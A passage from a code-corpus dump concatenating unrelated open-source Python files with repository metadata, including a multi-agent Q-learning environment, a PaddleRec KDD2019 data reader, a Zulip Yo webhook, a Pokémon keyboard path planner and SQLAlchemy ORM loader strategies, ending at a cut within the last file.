        """Execute one action per agent; invalid moves earn -1 reward."""
        rewards = list()
        encode_states = list()
        dones = list()
        for i in range(self.agent_num):
            if (self.is_move_correct(actions[i], i)):
                r, d = self.move(actions[i], i)
            else:
                r, d = -1, False
            encode_states.append(self.encode_state(i))
            rewards.append(r)
            dones.append(d)
        # NOTE(review): `False in dones` is True while any agent is unfinished;
        # verify this matches the intended gym `done` semantics.
        return encode_states, rewards, False in dones, {}

    def update_reward_matrix(self, matrix: list) -> None:
        """Add `matrix` element-wise into the reward matrix (in place)."""
        for x, lst in enumerate(self.reward_matrix):
            for y in range(len(lst)):
                self.reward_matrix[x][y] += matrix[x][y]

    def step(self, matrix: list) -> Tuple[list, float, list, dict]:
        """One env step: merge external rewards, act, apply Q-learning updates."""
        self.update_reward_matrix(matrix)
        actions = self.choose_action()
        s1, r, d, _ = self.action(actions)
        for index in range(self.agent_num):
            Q_sa = self.Q_list[index][self.s[index], actions[index]]
            # tabular Q-learning: Q += lr * (r + y * max_a' Q(s', a') - Q)
            self.Q_list[index][self.s[index], actions[index]] = Q_sa + self.lr * (r[index] + self.y * np.max(self.Q_list[index][s1[index], :]) - Q_sa)
            self.reward_all_arr[index] += r[index]
            self.s[index] = s1[index]
        return self.agent_matrix, np.mean(self.steps), d, {}

    def reset(self) -> List[int]:
        """Re-randomize agents/virus/destinations for a new episode; return grid."""
        agent_matrix = AGENT_MATRIX
        reward_matrix = REWARD_MATRIX
        self.episode += 1
        self.agent_matrix = agent_matrix = np.array(agent_matrix).astype(int)
        self.reward_matrix = self.get_reward_matrix(reward_matrix)
        self.agents = self.get_position()
        self.has_virus = self.get_virus()
        self.destinations = self.get_position()
        states = [self.encode_state(i) for i in range(self.agent_num)]
        self.s = states
        return np.array(agent_matrix).astype(int)
| 31.193662
| 144
| 0.590134
|
4a07e512d01c66e5bd778c0ab11a00f78fb138a0
| 5,988
|
py
|
Python
|
PaddleRec/ctr/Paddle_baseline_KDD2019/map_reader.py
|
suytingwan/models
|
ccdbfe77d071cc19b55fb9f4b738912e35d982ef
|
[
"Apache-2.0"
] | 5
|
2021-09-28T13:28:01.000Z
|
2021-12-21T07:25:44.000Z
|
PaddleRec/ctr/Paddle_baseline_KDD2019/map_reader.py
|
suytingwan/models
|
ccdbfe77d071cc19b55fb9f4b738912e35d982ef
|
[
"Apache-2.0"
] | 2
|
2019-06-26T03:21:49.000Z
|
2019-09-19T09:43:42.000Z
|
PaddleRec/ctr/Paddle_baseline_KDD2019/map_reader.py
|
suytingwan/models
|
ccdbfe77d071cc19b55fb9f4b738912e35d982ef
|
[
"Apache-2.0"
] | 3
|
2021-09-28T15:33:45.000Z
|
2021-09-29T01:44:32.000Z
|
# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import paddle.fluid.incubate.data_generator as dg
class MapDataset(dg.MultiSlotDataGenerator):
    """Paddle data generator turning KDD2019 map-recommendation JSON lines
    into dense features, hashed sparse features, and a label."""

    def setup(self, sparse_feature_dim):
        """Configure feature-group names and hashing parameters.

        NOTE(review): `sparse_feature_dim` is unused here; `hash_dim` is fixed.
        """
        self.profile_length = 65
        self.dense_length = 3
        #feature names
        self.dense_feature_list = ["distance", "price", "eta"]
        self.pid_list = ["pid"]
        self.query_feature_list = ["weekday", "hour", "o1", "o2", "d1", "d2"]
        self.plan_feature_list = ["transport_mode"]
        self.rank_feature_list = ["plan_rank", "whole_rank", "price_rank", "eta_rank", "distance_rank"]
        self.rank_whole_pic_list = ["mode_rank1", "mode_rank2", "mode_rank3", "mode_rank4",
                                    "mode_rank5"]
        self.weather_feature_list = ["max_temp", "min_temp", "wea", "wind"]
        self.hash_dim = 1000001
        self.train_idx_ = 2000000
        #carefully set if you change the features
        self.categorical_range_ = range(0, 22)

    #process one instance
    def _process_line(self, line):
        """Parse one JSON sample into (dense, sparse slots, sparse fm ids, label)."""
        instance = json.loads(line)
        """
        profile = instance["profile"]
        len_profile = len(profile)
        if len_profile >= 10:
            user_profile_feature = profile[0:10]
        else:
            profile.extend([0]*(10-len_profile))
            user_profile_feature = profile
        if len(profile) > 1 or (len(profile) == 1 and profile[0] != 0):
            for p in profile:
                if p >= 1 and p <= 65:
                    user_profile_feature[p - 1] = 1
        """
        context_feature = []
        context_feature_fm = []
        dense_feature = [0] * self.dense_length
        plan = instance["plan"]
        for i, val in enumerate(self.dense_feature_list):
            dense_feature[i] = plan[val]
        if (instance["pid"] == ""):
            instance["pid"] = 0
        query = instance["query"]
        weather_dic = instance["weather"]
        # Hash each categorical feature ("name" + str(value)) into hash_dim
        # buckets; kept both as one-item lists (slots) and flat ids (for FM).
        for fea in self.pid_list:
            context_feature.append([hash(fea + str(instance[fea])) % self.hash_dim])
            context_feature_fm.append(hash(fea + str(instance[fea])) % self.hash_dim)
        for fea in self.query_feature_list:
            context_feature.append([hash(fea + str(query[fea])) % self.hash_dim])
            context_feature_fm.append(hash(fea + str(query[fea])) % self.hash_dim)
        for fea in self.plan_feature_list:
            context_feature.append([hash(fea + str(plan[fea])) % self.hash_dim])
            context_feature_fm.append(hash(fea + str(plan[fea])) % self.hash_dim)
        for fea in self.rank_feature_list:
            context_feature.append([hash(fea + str(instance[fea])) % self.hash_dim])
            context_feature_fm.append(hash(fea + str(instance[fea])) % self.hash_dim)
        for fea in self.rank_whole_pic_list:
            context_feature.append([hash(fea + str(instance[fea])) % self.hash_dim])
            context_feature_fm.append(hash(fea + str(instance[fea])) % self.hash_dim)
        for fea in self.weather_feature_list:
            context_feature.append([hash(fea + str(weather_dic[fea])) % self.hash_dim])
            context_feature_fm.append(hash(fea + str(weather_dic[fea])) % self.hash_dim)
        label = [int(instance["label"])]
        return dense_feature, context_feature, context_feature_fm, label

    def infer_reader(self, filelist, batch, buf_size):
        """Shuffled batch reader over `filelist` (inference)."""
        print(filelist)

        def local_iter():
            # one sample per input line, in slot order expected downstream
            for fname in filelist:
                with open(fname.strip(), "r") as fin:
                    for line in fin:
                        dense_feature, sparse_feature, sparse_feature_fm, label = self._process_line(line)
                        yield [dense_feature] + sparse_feature + [sparse_feature_fm] + [label]
        import paddle
        batch_iter = paddle.batch(
            paddle.reader.shuffle(
                local_iter, buf_size=buf_size),
            batch_size=batch)
        return batch_iter

    #generate inputs for testing
    def test_reader(self, filelist, batch, buf_size):
        """Buffered (non-shuffled) batch reader over `filelist` (testing)."""
        print(filelist)

        def local_iter():
            for fname in filelist:
                with open(fname.strip(), "r") as fin:
                    for line in fin:
                        dense_feature, sparse_feature, sparse_feature_fm, label = self._process_line(line)
                        yield [dense_feature] + sparse_feature + [sparse_feature_fm] + [label]
        import paddle
        batch_iter = paddle.batch(
            paddle.reader.buffered(
                local_iter, size=buf_size),
            batch_size=batch)
        return batch_iter

    #generate inputs for training
    def generate_sample(self, line):
        """Per-line generator used by the Paddle dataset pipeline (training).

        Yields (feature_name, value) pairs: dense_feature, context0..21,
        context_fm, label.
        """
        def data_iter():
            dense_feature, sparse_feature, sparse_feature_fm, label = self._process_line(line)
            #feature_name = ["user_profile"]
            feature_name = []
            feature_name.append("dense_feature")
            for idx in self.categorical_range_:
                feature_name.append("context" + str(idx))
            feature_name.append("context_fm")
            feature_name.append("label")
            yield zip(feature_name, [dense_feature] + sparse_feature + [sparse_feature_fm] + [label])
        return data_iter
if __name__ == "__main__":
    # Entry point: sparse feature dim from argv[1], then stream samples
    # from stdin through the Paddle data-generator protocol.
    map_dataset = MapDataset()
    map_dataset.setup(int(sys.argv[1]))
    map_dataset.run_from_stdin()
| 41.013699
| 106
| 0.616232
|
4a07e558df59373c4d7dbfa6fe224c4d73a940c2
| 322
|
py
|
Python
|
bookshop/sqlalchemy/fixture/BookGenre.py
|
robyoung/genyrator
|
849f2ec83ef6dd9e2e5928cb58f747cc40016f2a
|
[
"MIT"
] | null | null | null |
bookshop/sqlalchemy/fixture/BookGenre.py
|
robyoung/genyrator
|
849f2ec83ef6dd9e2e5928cb58f747cc40016f2a
|
[
"MIT"
] | 9
|
2019-09-13T09:31:55.000Z
|
2021-01-11T11:09:17.000Z
|
bookshop/sqlalchemy/fixture/BookGenre.py
|
robyoung/genyrator
|
849f2ec83ef6dd9e2e5928cb58f747cc40016f2a
|
[
"MIT"
] | 1
|
2020-07-22T15:03:41.000Z
|
2020-07-22T15:03:41.000Z
|
import factory
from bookshop.sqlalchemy import db
from bookshop.sqlalchemy.model.BookGenre import BookGenre
class BookGenreFactory(factory.alchemy.SQLAlchemyModelFactory):
    """factory_boy fixture factory for the BookGenre model, bound to the
    app's SQLAlchemy session."""
    class Meta:
        model = BookGenre
        sqlalchemy_session = db.session
    # random uuid4, kept as-is (cast_to identity) rather than stringified
    book_genre_id = factory.Faker('uuid4', cast_to=lambda x: x)
| 24.769231
| 63
| 0.763975
|
4a07e570a298bd36f26c458c30ec6c6ed1b923c2
| 1,981
|
py
|
Python
|
extras/pokemontools/vba/keyboard.py
|
longlostsoul/EvoYellow
|
fe5d0d372c4e90d384c4005a93f19d7968f2ff13
|
[
"Unlicense"
] | 16
|
2018-08-28T21:47:01.000Z
|
2022-02-20T20:29:59.000Z
|
extras/pokemontools/vba/keyboard.py
|
longlostsoul/EvoYellow
|
fe5d0d372c4e90d384c4005a93f19d7968f2ff13
|
[
"Unlicense"
] | 5
|
2019-04-03T19:53:11.000Z
|
2022-03-11T22:49:34.000Z
|
extras/pokemontools/vba/keyboard.py
|
longlostsoul/EvoYellow
|
fe5d0d372c4e90d384c4005a93f19d7968f2ff13
|
[
"Unlicense"
] | 2
|
2019-12-09T19:46:02.000Z
|
2020-12-05T21:36:30.000Z
|
# -*- coding: utf-8 -*-
"""
This file constructs a networkx.DiGraph object called graph, which can be used
to find the shortest path of keypresses on the keyboard to type a word.
"""
import os
import itertools
import networkx
graph = networkx.DiGraph()

# Load the keyboard adjacency graph from keyboard.data (same directory as
# this module). Each non-blank, non-comment line has the form:
#   "<node1> <node2> <button>"
data_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "keyboard.data")
# use a context manager so the file handle is closed instead of leaked
with open(data_path, "r") as data_file:
    graph_data = data_file.read()
for line in graph_data.split("\n"):
    if line == "":
        continue
    elif line[0] == "#":
        continue
    (node1, node2, edge_name) = line.split(" ")
    graph.add_edge(node1, node2, key=edge_name)
def shortest_path(node1, node2):
    """
    Return the list of button presses that moves the cursor from node1 to
    node2 along the cheapest path in the keyboard graph.
    """
    path = networkx.shortest_path(graph, node1, node2)
    # each consecutive pair of path nodes maps to exactly one button press
    return [convert_nodes_to_button_press(src, dst)
            for (src, dst) in zip(path, path[1:])]
def convert_nodes_to_button_press(node1, node2):
    """
    Determines the button necessary to switch from node1 to node2,
    by reading the "key" attribute on the edge between them.
    """
    # NOTE: Python 2 print statement -- this module predates Python 3.
    print "getting button press for state transition: " + node1 + " -> " + node2
    return graph.get_edge_data(node1, node2)["key"]
def plan_typing(text, current="A"):
    """
    Plans a sequence of button presses to spell out the given text.

    `current` is the key the cursor starts on; an "a" press is appended
    after reaching each target character to select it.
    """
    buttons = []
    for target in text:
        if target == current:
            buttons.append("a")
        else:
            # NOTE: Python 2 print statement -- this module predates Python 3.
            print "Finding the shortest path between " + current + " and " + target
            more_buttons = shortest_path(current, target)
            buttons.extend(more_buttons)
            buttons.append("a")
            current = target
    return buttons
| 30.476923
| 142
| 0.64109
|
4a07e6f8bca5d0956fdd8a936991d3cfb5100f9f
| 902
|
py
|
Python
|
zerver/webhooks/yo/view.py
|
roberthoenig/zulip
|
5d6724345a8ba4896d21478be2e33e624f8ac8ab
|
[
"Apache-2.0"
] | null | null | null |
zerver/webhooks/yo/view.py
|
roberthoenig/zulip
|
5d6724345a8ba4896d21478be2e33e624f8ac8ab
|
[
"Apache-2.0"
] | null | null | null |
zerver/webhooks/yo/view.py
|
roberthoenig/zulip
|
5d6724345a8ba4896d21478be2e33e624f8ac8ab
|
[
"Apache-2.0"
] | null | null | null |
# Webhooks for external integrations.
from __future__ import absolute_import
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile
from django.http import HttpRequest, HttpResponse
from typing import Optional
import ujson
@api_key_only_webhook_view('Yo')
@has_request_variables
def api_yo_app_webhook(request, user_profile, email=REQ(default=None),
                       username=REQ(default='Yo Bot'), topic=REQ(default=None),
                       user_ip=REQ(default=None)):
    # type: (HttpRequest, UserProfile, Optional[str], str, Optional[str], Optional[str]) -> HttpResponse
    """Forward an incoming Yo notification as a private message to `email`.

    `user_ip` is accepted from the webhook payload but currently unused.
    """
    body = ('Yo from %s') % (username,)
    check_send_message(user_profile, request.client, 'private', [email], topic, body)
    return json_success()
| 41
| 104
| 0.752772
|
4a07e785696f3520085a40999762215510eb5bb1
| 55,884
|
py
|
Python
|
flask/lib/python2.7/site-packages/sqlalchemy/orm/strategies.py
|
blackbliss/callme
|
fe254ef4c3af36ab7a65f3de0071d2c79375e3e0
|
[
"MIT"
] | null | null | null |
flask/lib/python2.7/site-packages/sqlalchemy/orm/strategies.py
|
blackbliss/callme
|
fe254ef4c3af36ab7a65f3de0071d2c79375e3e0
|
[
"MIT"
] | 4
|
2017-10-24T22:44:01.000Z
|
2017-10-24T22:44:19.000Z
|
flask/lib/python2.7/site-packages/sqlalchemy/orm/strategies.py
|
blackbliss/callme
|
fe254ef4c3af36ab7a65f3de0071d2c79375e3e0
|
[
"MIT"
] | 1
|
2021-04-16T11:10:59.000Z
|
2021-04-16T11:10:59.000Z
|
# orm/strategies.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""sqlalchemy.orm.interfaces.LoaderStrategy
implementations, and related MapperOptions."""
from .. import exc as sa_exc, inspect
from .. import util, log, event
from ..sql import util as sql_util, visitors
from .. import sql
from . import (
attributes, interfaces, exc as orm_exc, loading,
unitofwork, util as orm_util
)
from .state import InstanceState
from .util import _none_set
from . import properties
from .interfaces import (
LoaderStrategy, StrategizedProperty
)
from .session import _state_session
import itertools
def _register_attribute(strategy, mapper, useobject,
                        compare_function=None,
                        typecallable=None,
                        uselist=False,
                        callable_=None,
                        proxy_property=None,
                        active_history=False,
                        impl_class=None,
                        **kw
                        ):
    """Register an instrumented attribute for `strategy`'s parent property
    on `mapper`'s class and every descendant mapper that owns the same
    property, wiring up validator, cascade-tracking and backref listeners.
    """
    prop = strategy.parent_property

    attribute_ext = list(util.to_list(prop.extension, default=[]))

    # listener hooks are collected first, then applied per-descriptor below
    listen_hooks = []

    if useobject and prop.single_parent:
        listen_hooks.append(single_parent_validator)

    if prop.key in prop.parent.validators:
        fn, opts = prop.parent.validators[prop.key]
        listen_hooks.append(
            lambda desc, prop: orm_util._validator_events(desc,
                                prop.key, fn, **opts)
        )

    if useobject:
        listen_hooks.append(unitofwork.track_cascade_events)

    # need to assemble backref listeners
    # after the singleparentvalidator, mapper validator
    backref = kw.pop('backref', None)
    if backref:
        listen_hooks.append(
            lambda desc, prop: attributes.backref_listeners(desc,
                                backref,
                                uselist)
        )

    for m in mapper.self_and_descendants:
        if prop is m._props.get(prop.key):
            # only instrument on mappers that actually own this property
            desc = attributes.register_attribute_impl(
                m.class_,
                prop.key,
                parent_token=prop,
                uselist=uselist,
                compare_function=compare_function,
                useobject=useobject,
                extension=attribute_ext,
                trackparent=useobject and (prop.single_parent
                                           or prop.direction is interfaces.ONETOMANY),
                typecallable=typecallable,
                callable_=callable_,
                active_history=active_history,
                impl_class=impl_class,
                send_modified_events=not useobject or not prop.viewonly,
                doc=prop.doc,
                **kw
            )

            for hook in listen_hooks:
                hook(desc, prop)
@properties.ColumnProperty.strategy_for(instrument=False, deferred=False)
class UninstrumentedColumnLoader(LoaderStrategy):
    """Represent a non-instrumented MapperProperty.

    The polymorphic_on argument of mapper() often results in this,
    if the argument is against the with_polymorphic selectable.

    """

    def __init__(self, parent):
        super(UninstrumentedColumnLoader, self).__init__(parent)
        self.columns = self.parent_property.columns

    def setup_query(self, context, entity, path, loadopt, adapter,
                    column_collection=None, **kwargs):
        # Columns still need to be present in the SELECT even though no
        # attribute is instrumented for them.
        for c in self.columns:
            if adapter:
                c = adapter.columns[c]
            column_collection.append(c)

    def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
        # no instrumentation -> nothing to populate per row
        return None, None, None
@log.class_logger
@properties.ColumnProperty.strategy_for(instrument=True, deferred=False)
class ColumnLoader(LoaderStrategy):
    """Provide loading behavior for a :class:`.ColumnProperty`."""

    def __init__(self, parent):
        super(ColumnLoader, self).__init__(parent)
        self.columns = self.parent_property.columns
        self.is_composite = hasattr(self.parent_property, 'composite_class')

    def setup_query(self, context, entity, path, loadopt,
                    adapter, column_collection, **kwargs):
        # add this property's (possibly adapted) columns to the SELECT
        for c in self.columns:
            if adapter:
                c = adapter.columns[c]
            column_collection.append(c)

    def init_class_attribute(self, mapper):
        self.is_class_level = True
        coltype = self.columns[0].type
        # TODO: check all columns ?  check for foreign key as well?
        active_history = self.parent_property.active_history or \
            self.columns[0].primary_key or \
            mapper.version_id_col in set(self.columns)

        _register_attribute(self, mapper, useobject=False,
                            compare_function=coltype.compare_values,
                            active_history=active_history
                            )

    def create_row_processor(self, context, path,
                             loadopt, mapper, row, adapter):
        key = self.key
        # look through list of columns represented here
        # to see which, if any, is present in the row.
        for col in self.columns:
            if adapter:
                col = adapter.columns[col]
            if col is not None and col in row:
                def fetch_col(state, dict_, row):
                    dict_[key] = row[col]
                return fetch_col, None, None
        else:
            # for/else: no candidate column was present in the row, so
            # expire the attribute pre-commit instead of populating it
            def expire_for_non_present_col(state, dict_, row):
                state._expire_attribute_pre_commit(dict_, key)
            return expire_for_non_present_col, None, None
@log.class_logger
@properties.ColumnProperty.strategy_for(deferred=True, instrument=True)
class DeferredColumnLoader(LoaderStrategy):
    """Provide loading behavior for a deferred :class:`.ColumnProperty`."""

    def __init__(self, parent):
        super(DeferredColumnLoader, self).__init__(parent)
        if hasattr(self.parent_property, 'composite_class'):
            raise NotImplementedError("Deferred loading for composite "
                                      "types not implemented yet")
        self.columns = self.parent_property.columns
        self.group = self.parent_property.group

    def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
        col = self.columns[0]
        if adapter:
            col = adapter.columns[col]

        key = self.key
        if col in row:
            # column is present in the row anyway (e.g. undeferred) --
            # delegate to the eager ColumnLoader
            return self.parent_property._get_strategy_by_cls(ColumnLoader).\
                create_row_processor(
                    context, path, loadopt, mapper, row, adapter)

        elif not self.is_class_level:
            # per-instance deferral: install a loader callable on the state
            set_deferred_for_local_state = InstanceState._row_processor(
                mapper.class_manager,
                LoadDeferredColumns(key), key)
            return set_deferred_for_local_state, None, None
        else:
            def reset_col_for_deferred(state, dict_, row):
                # reset state on the key so that deferred callables
                # fire off on next access.
                state._reset(dict_, key)
            return reset_col_for_deferred, None, None

    def init_class_attribute(self, mapper):
        self.is_class_level = True

        _register_attribute(self, mapper, useobject=False,
                            compare_function=self.columns[0].type.compare_values,
                            callable_=self._load_for_state,
                            expire_missing=False
                            )

    def setup_query(self, context, entity, path, loadopt, adapter,
                    only_load_props=None, **kwargs):
        # emit the column only when undeferred via its group option or
        # explicitly requested through only_load_props
        if (
            loadopt and self.group and
            loadopt.local_opts.get('undefer_group', False) == self.group
        ) or (only_load_props and self.key in only_load_props):
            self.parent_property._get_strategy_by_cls(ColumnLoader).\
                setup_query(context, entity,
                            path, loadopt, adapter, **kwargs)

    def _load_for_state(self, state, passive):
        """Load the deferred column (and its deferral group, if any) via a
        new query against the state's owning session."""
        if not state.key:
            return attributes.ATTR_EMPTY

        if not passive & attributes.SQL_OK:
            return attributes.PASSIVE_NO_RESULT

        localparent = state.manager.mapper

        if self.group:
            # all deferred properties sharing this group load together
            toload = [
                p.key for p in
                localparent.iterate_properties
                if isinstance(p, StrategizedProperty) and
                isinstance(p.strategy, DeferredColumnLoader) and
                p.group == self.group
            ]
        else:
            toload = [self.key]

        # narrow the keys down to just those which have no history
        group = [k for k in toload if k in state.unmodified]

        session = _state_session(state)
        if session is None:
            raise orm_exc.DetachedInstanceError(
                "Parent instance %s is not bound to a Session; "
                "deferred load operation of attribute '%s' cannot proceed" %
                (orm_util.state_str(state), self.key)
            )

        query = session.query(localparent)
        if loading.load_on_ident(query, state.key,
                                 only_load_props=group, refresh_state=state) is None:
            raise orm_exc.ObjectDeletedError(state)

        return attributes.ATTR_WAS_SET
class LoadDeferredColumns(object):
    """serializable loader object used by DeferredColumnLoader"""

    def __init__(self, key):
        self.key = key

    def __call__(self, state, passive=attributes.PASSIVE_OFF):
        # resolve the property named by self.key on the state's mapper and
        # delegate the actual load to its deferred-column strategy
        prop = state.manager.mapper._props[self.key]
        strategy = prop._strategies[DeferredColumnLoader]
        return strategy._load_for_state(state, passive)
class AbstractRelationshipLoader(LoaderStrategy):
    """LoaderStrategies which deal with related objects."""

    def __init__(self, parent):
        super(AbstractRelationshipLoader, self).__init__(parent)
        # cache commonly-used relationship attributes from the property
        self.mapper = self.parent_property.mapper
        self.target = self.parent_property.target
        self.uselist = self.parent_property.uselist
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy="noload")
@properties.RelationshipProperty.strategy_for(lazy=None)
class NoLoader(AbstractRelationshipLoader):
    """Provide loading behavior for a :class:`.RelationshipProperty`
    with "lazy=None".

    """

    def init_class_attribute(self, mapper):
        self.is_class_level = True

        _register_attribute(self, mapper,
                            useobject=True,
                            uselist=self.parent_property.uselist,
                            typecallable=self.parent_property.collection_class,
                            )

    def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
        # never load: just initialize the attribute to its empty state
        def invoke_no_load(state, dict_, row):
            state._initialize(self.key)
        return invoke_no_load, None, None
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy=True)
@properties.RelationshipProperty.strategy_for(lazy="select")
class LazyLoader(AbstractRelationshipLoader):
"""Provide loading behavior for a :class:`.RelationshipProperty`
with "lazy=True", that is loads when first accessed.
"""
def __init__(self, parent):
super(LazyLoader, self).__init__(parent)
join_condition = self.parent_property._join_condition
self._lazywhere, \
self._bind_to_col, \
self._equated_columns = join_condition.create_lazy_clause()
self._rev_lazywhere, \
self._rev_bind_to_col, \
self._rev_equated_columns = join_condition.create_lazy_clause(
reverse_direction=True)
self.logger.info("%s lazy loading clause %s", self, self._lazywhere)
# determine if our "lazywhere" clause is the same as the mapper's
# get() clause. then we can just use mapper.get()
self.use_get = not self.uselist and \
self.mapper._get_clause[0].compare(
self._lazywhere,
use_proxies=True,
equivalents=self.mapper._equivalent_columns
)
if self.use_get:
for col in list(self._equated_columns):
if col in self.mapper._equivalent_columns:
for c in self.mapper._equivalent_columns[col]:
self._equated_columns[c] = self._equated_columns[col]
self.logger.info("%s will use query.get() to "
"optimize instance loads" % self)
def init_class_attribute(self, mapper):
self.is_class_level = True
active_history = (
self.parent_property.active_history or
self.parent_property.direction is not interfaces.MANYTOONE or
not self.use_get
)
# MANYTOONE currently only needs the
# "old" value for delete-orphan
# cascades. the required _SingleParentValidator
# will enable active_history
# in that case. otherwise we don't need the
# "old" value during backref operations.
_register_attribute(self,
mapper,
useobject=True,
callable_=self._load_for_state,
uselist=self.parent_property.uselist,
backref=self.parent_property.back_populates,
typecallable=self.parent_property.collection_class,
active_history=active_history
)
def lazy_clause(self, state, reverse_direction=False,
alias_secondary=False,
adapt_source=None,
passive=None):
if state is None:
return self._lazy_none_clause(
reverse_direction,
adapt_source=adapt_source)
if not reverse_direction:
criterion, bind_to_col, rev = \
self._lazywhere, \
self._bind_to_col, \
self._equated_columns
else:
criterion, bind_to_col, rev = \
self._rev_lazywhere, \
self._rev_bind_to_col, \
self._rev_equated_columns
if reverse_direction:
mapper = self.parent_property.mapper
else:
mapper = self.parent_property.parent
o = state.obj() # strong ref
dict_ = attributes.instance_dict(o)
# use the "committed state" only if we're in a flush
# for this state.
if passive and passive & attributes.LOAD_AGAINST_COMMITTED:
def visit_bindparam(bindparam):
if bindparam._identifying_key in bind_to_col:
bindparam.callable = \
lambda: mapper._get_committed_state_attr_by_column(
state, dict_,
bind_to_col[bindparam._identifying_key])
else:
def visit_bindparam(bindparam):
if bindparam._identifying_key in bind_to_col:
bindparam.callable = \
lambda: mapper._get_state_attr_by_column(
state, dict_,
bind_to_col[bindparam._identifying_key])
if self.parent_property.secondary is not None and alias_secondary:
criterion = sql_util.ClauseAdapter(
self.parent_property.secondary.alias()).\
traverse(criterion)
criterion = visitors.cloned_traverse(
criterion, {}, {'bindparam': visit_bindparam})
if adapt_source:
criterion = adapt_source(criterion)
return criterion
def _lazy_none_clause(self, reverse_direction=False, adapt_source=None):
if not reverse_direction:
criterion, bind_to_col, rev = \
self._lazywhere, \
self._bind_to_col,\
self._equated_columns
else:
criterion, bind_to_col, rev = \
self._rev_lazywhere, \
self._rev_bind_to_col, \
self._rev_equated_columns
criterion = sql_util.adapt_criterion_to_null(criterion, bind_to_col)
if adapt_source:
criterion = adapt_source(criterion)
return criterion
def _load_for_state(self, state, passive):
if not state.key and \
(
(
not self.parent_property.load_on_pending
and not state._load_pending
)
or not state.session_id
):
return attributes.ATTR_EMPTY
pending = not state.key
ident_key = None
if (
(not passive & attributes.SQL_OK and not self.use_get)
or
(not passive & attributes.NON_PERSISTENT_OK and pending)
):
return attributes.PASSIVE_NO_RESULT
session = _state_session(state)
if not session:
raise orm_exc.DetachedInstanceError(
"Parent instance %s is not bound to a Session; "
"lazy load operation of attribute '%s' cannot proceed" %
(orm_util.state_str(state), self.key)
)
# if we have a simple primary key load, check the
# identity map without generating a Query at all
if self.use_get:
ident = self._get_ident_for_use_get(
session,
state,
passive
)
if attributes.PASSIVE_NO_RESULT in ident:
return attributes.PASSIVE_NO_RESULT
elif attributes.NEVER_SET in ident:
return attributes.NEVER_SET
if _none_set.issuperset(ident):
return None
ident_key = self.mapper.identity_key_from_primary_key(ident)
instance = loading.get_from_identity(session, ident_key, passive)
if instance is not None:
return instance
elif not passive & attributes.SQL_OK or \
not passive & attributes.RELATED_OBJECT_OK:
return attributes.PASSIVE_NO_RESULT
return self._emit_lazyload(session, state, ident_key, passive)
def _get_ident_for_use_get(self, session, state, passive):
instance_mapper = state.manager.mapper
if passive & attributes.LOAD_AGAINST_COMMITTED:
get_attr = instance_mapper._get_committed_state_attr_by_column
else:
get_attr = instance_mapper._get_state_attr_by_column
dict_ = state.dict
return [
get_attr(
state,
dict_,
self._equated_columns[pk],
passive=passive)
for pk in self.mapper.primary_key
]
    @util.dependencies("sqlalchemy.orm.strategy_options")
    def _emit_lazyload(self, strategy_options, session, state, ident_key, passive):
        """Emit the lazy-load SELECT and return its result.

        ``strategy_options`` is injected by the ``@util.dependencies``
        decorator (resolved import of ``sqlalchemy.orm.strategy_options``).
        Returns a list for uselist relationships, a scalar-or-None
        otherwise, or ``None`` when a pending parent has unresolved
        (None) bind values.
        """
        q = session.query(self.mapper)._adapt_all_clauses()
        if self.parent_property.secondary is not None:
            q = q.select_from(self.mapper, self.parent_property.secondary)
        q = q._with_invoke_all_eagers(False)
        pending = not state.key
        # don't autoflush on pending
        if pending or passive & attributes.NO_AUTOFLUSH:
            q = q.autoflush(False)
        # Propagate loader path/options from the parent load so that
        # per-path options continue to apply down the chain.
        if state.load_path:
            q = q._with_current_path(state.load_path[self.parent_property])
        if state.load_options:
            q = q._conditional_options(*state.load_options)
        if self.use_get:
            # Simple PK lookup; delegates to the identity-aware loader.
            return loading.load_on_ident(q, ident_key)
        if self.parent_property.order_by:
            q = q.order_by(*util.to_list(self.parent_property.order_by))
        for rev in self.parent_property._reverse_property:
            # reverse props that are MANYTOONE are loading *this*
            # object from get(), so don't need to eager out to those.
            if rev.direction is interfaces.MANYTOONE and \
                    rev._use_get and \
                    not isinstance(rev.strategy, LazyLoader):
                q = q.options(strategy_options.Load(rev.parent).lazyload(rev.key))
        lazy_clause = self.lazy_clause(state, passive=passive)
        if pending:
            # A pending parent with any None bind value cannot match.
            bind_values = sql_util.bind_values(lazy_clause)
            if None in bind_values:
                return None
        q = q.filter(lazy_clause)
        result = q.all()
        if self.uselist:
            return result
        else:
            l = len(result)
            if l:
                if l > 1:
                    # uselist=False but the criterion matched many rows:
                    # warn and return the first.
                    util.warn(
                        "Multiple rows returned with "
                        "uselist=False for lazily-loaded attribute '%s' "
                        % self.parent_property)
                return result[0]
            else:
                return None
    def create_row_processor(self, context, path, loadopt,
                             mapper, row, adapter):
        """Return the ``(new_row, existing_row, exec)`` processor triple
        used during result-row population for this lazy-loaded attribute.
        """
        key = self.key
        if not self.is_class_level:
            # we are not the primary manager for this attribute
            # on this class - set up a
            # per-instance lazyloader, which will override the
            # class-level behavior.
            # this currently only happens when using a
            # "lazyload" option on a "no load"
            # attribute - "eager" attributes always have a
            # class-level lazyloader installed.
            set_lazy_callable = InstanceState._row_processor(
                mapper.class_manager,
                LoadLazyAttribute(key), key)
            return set_lazy_callable, None, None
        else:
            def reset_for_lazy_callable(state, dict_, row):
                # we are the primary manager for this attribute on
                # this class - reset its
                # per-instance attribute state, so that the class-level
                # lazy loader is
                # executed when next referenced on this instance.
                # this is needed in
                # populate_existing() types of scenarios to reset
                # any existing state.
                state._reset(dict_, key)
            return reset_for_lazy_callable, None, None
class LoadLazyAttribute(object):
